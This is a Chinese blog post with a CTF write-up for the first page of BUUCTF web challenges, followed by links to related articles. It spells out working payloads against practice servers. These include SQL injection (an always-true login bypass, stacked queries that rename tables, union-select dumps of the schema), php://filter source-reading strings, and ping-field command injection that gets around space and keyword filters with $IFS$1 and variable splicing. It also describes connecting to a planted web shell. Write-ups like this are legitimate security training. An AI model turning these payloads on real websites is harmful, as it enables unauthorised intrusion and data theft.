BUU CTF刷题之旅(Web第一页)

最新推荐文章于 2024-05-13 09:44:14 发布
最新推荐文章于 2024-05-13 09:44:14 发布
阅读量3.8k 收藏 1
点赞数 1
分类专栏: CTF 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51563603/article/details/123159185
版权 
前言:
之前本人是在CTFHub上刷题,已经有了一些基础,是时候换成更难的BUU了!
这里将会记录一些做题过程,希望也可以帮助到大家

[极客大挑战 2019]EasySQL

这道题主要是一个恒真的想法,这种我之前也是没怎么遇到过,就当一个记录

输入’发现有报错,那么应该是字符型注入
在这里插入图片描述
然后,,然后直接输入
/check.php?username=1234' or '1'='1&password=1234 or '1'='1
通过一个or的恒真判断就可以过了,,
在这里插入图片描述

唔可能后端都没有进行数据的查询吧!
想复杂了

[极客大挑战 2019]Havefun

这道题出奇的简单,打开网页发现源代码:
在这里插入图片描述
发现传入cat=dog即可
在这里插入图片描述

[ACTF2020 新生赛]Include

在这里插入图片描述
发现过滤了一些伪协议,那么常见的伪协议一个个试过去呗!
试到php://filter时好像没被过滤
那直接通过base64读源码嘛,,
/?file=php://filter/read=convert.base64-encode/resource=flag.php
在这里插入图片描述
base64解码就行

[强网杯 2019]随便注

经过尝试发现select|update|delete|drop|insert|where都被过滤了,而且有了/i 那么变大小写都没用
在这里插入图片描述
网上搜了WP,提示可以用show来绕过select
在这里插入图片描述

这里其实还有一个叫堆叠注入的知识点,就是可以通过分号分割来执行多条SQL语句,这种注入方法对环境要求比较苛刻,一般都不能实现这样的环境
加上 show tables;可以看到以下表
在这里插入图片描述
1';show columns from `1919810931114514`;#
可以查看1919810931114514库中所有字段,于是发现了flag
但是没办法直接读取,需要进行一个名字的改
因为words表中是已经有的数据,所以可以利用查询words的select查询1919810931114514中的数据
最后:
1';alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50); #
再查询
1' or '1'='1即可回显所有数据
在这里插入图片描述

[SUCTF 2019]EasySQL

不多说了,这道题我干了好久都没干出来,看了大佬的文章终于懂了,这里放一下网址

这道题主要是要注意到后端SQL是有一个||来拼接的就可以过去了

Exec

这道题比较简单,之前在CTFHub上也做过,就不多赘述,
一看到PING一个地址,就可以想到可能是后端命令行会执行你输入的语句,输入几个cd和ls试试看?果真!
在这里插入图片描述
加几个cd后就可以看到flag啦!如果这时候cd不了flag,那么说明flag是文件,只要用cat命令查看flag就好啦
在这里插入图片描述
结束。

Secret File

一开始不知道干啥,随便鼠标划了下,找到了入口。。。
在这里插入图片描述
然后访问后发现有302,则用python脚本禁止302,得到secr3t.php
在这里插入图片描述
访问,得到secr3t.php的源码,里面过滤了…/ data input tp等
在这里插入图片描述
但是没有过滤php呀!直接进行构造伪协议
/secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php
在这里插入图片描述
把flag.php的源码按照base64的方法读出来,再解码就行啦
在这里插入图片描述

Ping Ping Ping

这道题过滤了老多东西了,有点小烦
首先还是正常的开篇一个ls命令,出来了两个文件
在这里插入图片描述
后来发现他们过滤掉了我们的空格,那用 $IFS$1来绕过过滤,先来查看下index.php
命令如下:

http://077ad8ea-9a6d-4c7b-8736-20fdebb1dc9a.node4.buuoj.cn:81/?ip=127.0.0.1;cat$IFS$1index.php;
在这里插入图片描述
可以大致看出它把flag直接整成了贪婪过滤,这玩个锤子,,而且还过滤了大部分标点符号,emmmmm
其实这道题如果不过滤标点的话可以用文件合并的方法来做,可惜它过滤了>符号,就直接G
我也想过用base64,结果这个方法必须要用到双引号或者单引号,emm也都被过滤了

最后还是用变量赋值的方法做出来了,具体方法就是

  1. 先赋值一个变量a=ag;
  2. 再输入;fl$a.php;就可以等效flag.php啦!
  3. 其他类似的都可以

最终命令:
view-source:http://077ad8ea-9a6d-4c7b-8736-20fdebb1dc9a.node4.buuoj.cn:81/?ip=127.0.0.1;b=lag;cat$IFS$1f$b.php;
在这里插入图片描述

[极客大挑战 2019]LoveSQL

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

接下去我认为是布尔盲注,可以通过写Python代码的方式去爆破,
我也是发现了注入点
在这里插入图片描述
但是觉得太麻烦了,后来去看了别人的才知道可以用其他方法,,

首先用union select测试注入点
在这里插入图片描述
可以看到第2个和第三个位置有回显

这里要注意两点:

  1. 在url中不能直接写#,要用url编码%23才行
  2. 要让user查不出数据才行,所以不能等于admin
  3. 出现这个The used SELECT statements have a different number of columns说明union select 返回的字段数和之前不同,需要增加或者减少union select后面的字段数

可以看到把database()和version()放在第二个和第三个位置时能查出数据
在这里插入图片描述
爆表
?username=admi' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=b7f69cf522e5374a02b2b4885566bd41
在这里插入图片描述
爆字段
?username=admi' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=b7f69cf522e5374a02b2b4885566bd41

在这里插入图片描述
flag
?username=admi' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=b7f69cf522e5374a02b2b4885566bd41
在这里插入图片描述

Knife

这道题没啥好说的,直接蚁剑或者菜刀工具连接shell就好了
在这里插入图片描述

迷失的蓝色小恐龙
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF Web1
ookami6497的博客
12-11 881
SUCTF2019-EasySQL
wyj_1216 House
02-08 394
题目 writeup 尝试输入:1 尝试众多后发现有三种返回值: 正常回显 nonono 空白 考虑到前面做过的题,堆叠注入 上网查看各位大佬的文章,找到了源码: <?php session_start(); include_once "config.php"; $post = array(); $get = array(); globa...
sql_mode详解(超详细,亲测有效)
lky_for_lucky的博客
11-27 4万+
写在前面:处理MySQL数据库工作中遇到关于sql_mode的情况,特学习记录一下 1.sql_mode sql_mode是一组语法校验规则 2.查询sql_mode ①命令:select @@GLOBAL.sql_mode或者select @@SESSION.sql_mode 例如:②查看my.conf配置文件 例如:3.设置sql_mode ①命令:SET GLOBAL sql_mode=‘mode’;或者SET SESSION sql_mode=‘mode’;(mode替换为实际配置)。 ②修改my.
CTF练习】BUUCTF WEB(1)
最新发布
2401_84968612的博客
05-13 523
/内联:将反引号内命令的输出作为输入执行。//|sh 就是执行前面的echo脚本。
CTFHub-SQL注入
yuqie的博客
06-13 898
当传入的ID参数为and 1=2时,由于1=2不成立,所以返回假,页面就会返回与id=1不同的结果。需要注意的是,当level默认为1的时候,默认不扫cookie的内容,必须是level大于等于2才能扫cookie里的内容,所以这里选用level 2.很明显,直接使用rand函数每次产生的数值不一样,但当我们提供了一个固定的随机数的种子0之后,每次产生的值都是相同的,这也可以称之为伪随机。配合上floor函数就可以产生确定的两个数,即0和1并且结合固定的随机种子0,它每次产生的随机数列都是相同的值。
CTFHubweb SQL注入)
2301_81105268的博客
04-18 1106
id=1这个语句在数据库中返回几列,也就是SELECT * FROM uers WHERE id=1 and 1=2 LIMIT 1,0这个语句的数据结果集有几列,然后才可以用union进行联合查询。(2)可以用concat()或concat_ws()或group_concat()—[见数据库连接语句]----使得在sql注入时快速获得数据库的相关信息。使用order by语句进行测试:1 order by 1、1 order by 2等,直到报错为止,报错的前一个数,为字段数。
CTF-BUUCTF-Web-EasySQL
qq_42404383的博客
12-30 3485
CTF-BUUCTF-Web-EasySQL 如题: 解题思路: EasySQL 新手恶补: 什么是SQL注入? SQL注入(SQLi)是一种注入攻击,,可以执行恶意SQL语句。它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页或Web应用程序的身份验证和授权,并检索整个SQL数据库的内容;还...
BUUCTF[极客大挑战 2019] EasySQL 1
m0_75178803的博客
06-12 4307
因为这道题是基于sql单引号的注入,我们构造万能密码,#在sql注入中是注释符。题目来源:BUUCTF [极客大挑战 2019] EasySQL 1。用or连接,因为1=1恒真,假或真=真,真或真=真,所以这个语句恒成立。输入 1' union select 1,2,3。查看报错信息发现是基于单引号的注入。由一道题简单引出万能密码的知识点。这是查询数据库可能会用到的句型。只有当输入1’时,页面报错。直接在用户名或者密码区输入。只有当列名字段数为3时,
BUUCTF-练习场-WEB-第一部分(8道)
weixin_45908624的博客
02-15 2003
BUUCTF-WEB 8道题
BUUCTF--web(1)
2302_79119987的博客
04-25 822
发现现在身份验证和密码都是对的,可以开始支付了题目中说:Flag need your 100000000 money,尝试上传money,显示上传数字过长,想到了可以用科学计数法绕过,e表示10,e后面的数字表示次方,100000000表示为1e8,尝试输入money=1e8后提示money不够。它接受一个路径作为参数,并返回一个包含指定目录中所有文件和文件夹的数组。无论是PHP弱比较还是强比较,md5()函数无法处理数组,如果传入的是数组,会返回NULL,两个数组经过加密后返回值均为NULL,形成相等。
BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL
weixin_48799157的博客
03-26 2623
小白一个,记录一下解题过程,如有错误请指正! 一、EasySQL 1.这里我们使用一句话万能密码就可以了,记得加上# 1' or '1'='1'# 2.登录就可以拿到flag 二、LoveSQL 网页里说用sqlmap是没有灵魂滴,但是还是手痒试了一下,发现什么都扫不出来,可能是我太菜了能力还没到家,希望有大佬能指点一下~ 1.我们只能运用灵魂了,用万能句尝试一下,发现登录进来了,但是没有flag 2.猜测flag应该是放在某个字段里了,我们用联合注入(un...
BUUCTFweb方向题目(一)
wanan的博客
10-06 386
BUUCTFweb方向题目(一)
Buuctf web真题1(php伪协议&Rce过滤绕过&md5()小bug&http)
weixin_63231007的博客
04-05 2090
[ACTF2020 新生赛]Include 考察利用php://filter伪协议进行文件包含 首先尝试php://input伪协议: 发现被过滤。 然后尝试使用php://filter伪协议来继续包含, 构造playloads:php://filter/read=convert.base64-encode/resource=flag.php 得到base码。 将其进行解码,得到flag。 ......
buuctf刷题之旅web(一)
qq_50589021的博客
08-17 4912
2021-01-15 第一题:[HCTF 2018]WarmUp 这里懒得上传图片了,所以就直接笔记了 源代码里面有1.source.php,所以打开以后还会发先2.hint.php 1打开后会发现是代码审计 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["s
[SUCTF 2019]EasySQL--SQL注入--将||视为字符串连接符而非或运算符
cainiao17441898的博客
06-03 145
前言: 看了大佬的wp才会,这里要猜得出数据库里面的匹配语句是啥才行。 select $_POST[query] || flag from flag 解题: 输入1之后会回显: 输入1’,什么都没显示. 输入1"之后发现。"被过滤了。 fuzz测试之后发现他过滤l很多,但是无论输入什么数字都只会出现第一幅图的界面。就可以猜测出来这里可能返回的是bool值。 背后的逻辑:select $_POST[query] || flag from flag 看了wp后发现:PIPES_AS_CONCAT能将||视为字符
BUUCTF刷题Web解题方法总结(一)
Y1seco的博客
03-28 5166
文章目录1.堆叠注入,原理2.SQL缺省代码审计SQL注入 1.堆叠注入,原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FRO
ctfhub技能书+历年真题学习笔记(详解)
热门推荐
qq_50589021的博客
03-30 7万+
Web Web前置技能 HTTP协议 请求方式 题目: HTTP Method is GET Use CTF**B Method, I will give you flag. Hint: If you got 「HTTP Method Not Allowed」 Error, you should request index.php. 意思就是你是get请求,你把这个请求换成CTFHUB就行 所以抓包直接一把梭 302跳转 题目: No Flag here! Give me Flag 点击发现没有跳转
每天一道CTF---BUUCTF---练习场----EasySQL1---
qq_51550750的博客
01-14 596
每天一道CTF 思路: 点击“登陆”: 利用 hackbar load: http://16af3314-26ae-4fc9-a578-dc1a13f86569.node4.buuoj.cn:81/check.php?username=1&password=1 http://16af3314-26ae-4fc9-a578-dc1a13f86569.node4.buuoj.cn:81/check.php?username=1’ – -&password=1 http://16af3
buu ctf web进阶]ssti
08-23
- *1* *2* *3* [(wp)ctfweb-buu中ssti模板注入](https://blog.csdn.net/qq_51862722/article/details/118685275)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值